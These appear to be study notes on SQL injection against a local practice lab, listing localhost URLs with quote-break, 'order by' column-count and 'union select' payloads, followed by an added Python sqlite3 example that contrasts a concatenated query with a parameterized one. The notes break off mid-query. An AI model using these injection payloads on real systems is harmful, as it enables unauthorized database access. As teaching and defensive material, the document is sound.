1. Method
url:http://localhost/index.php?id=1
Queries the current database table for the row whose id equals 1
url:http://localhost/index.php?name=admin
Queries the current database table for rows whose name equals admin
url:http://localhost/index.php?type=database
Queries the current database table for articles whose type is database
select * from user where id=1 (integer type)
select id,name,type from user where type='database' (string type)
2.
url:http://localhost/Less-1/index.php?id=1
Guess: select * from user where id=1
Returned: 1' LIMIT 0,1
This confirms that the input is executed between the ' and the comment
url:http://localhost/Less-1/index.php?id=1' -- 111
url:localhost/Less-1/index.php?id=1' order by 3 -- 111 (determine the number of columns)
url:http://localhost/Less-1/index.php?id=1%27%20union%20select%201,2,3%20--%20111
select * from user where id='1' uni
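
Added example, not part of the original notes: the string-type query from section 2 built by concatenation, next to the same query with a bound parameter, run against the id values shown above. It uses Python's sqlite3 with a constructed in-memory `user` table instead of the PHP/MySQL lab, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample table, modelled on the `user` table in the notes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER, name TEXT, type TEXT)")
    db.execute("INSERT INTO user VALUES (1, 'admin', 'database')")
    return db

def lookup_concat(db, raw_id):
    # String-type query built by concatenation, as guessed in the notes:
    # anything after a quote in raw_id is parsed as SQL.
    sql = "SELECT id,name,type FROM user WHERE id='" + raw_id + "' LIMIT 0,1"
    return db.execute(sql).fetchall()

def lookup_bound(db, raw_id):
    # Same query with a bound parameter: raw_id is only ever a value,
    # so quotes and comment markers in it never reach the SQL parser.
    sql = "SELECT id,name,type FROM user WHERE id=? LIMIT 0,1"
    return db.execute(sql, (raw_id,)).fetchall()

def compare(raw_id):
    # Returns (result of concatenated query, result of bound query).
    db = make_db()
    try:
        concat = lookup_concat(db, raw_id)
    except sqlite3.OperationalError as exc:
        # The broken quoting surfaces as a syntax error, like the
        # "1' LIMIT 0,1" fragment returned in section 2.
        concat = "SQL error: %s" % exc
    return concat, lookup_bound(db, raw_id)

if __name__ == "__main__":
    # id values taken from the URLs in the notes
    for value in ["1", "1'", "1' -- 111", "1' union select 1,2,3 -- 111"]:
        print(repr(value), compare(value))
```

With the bound parameter only the plain id 1 returns a row; the other values match nothing and cause no SQL error.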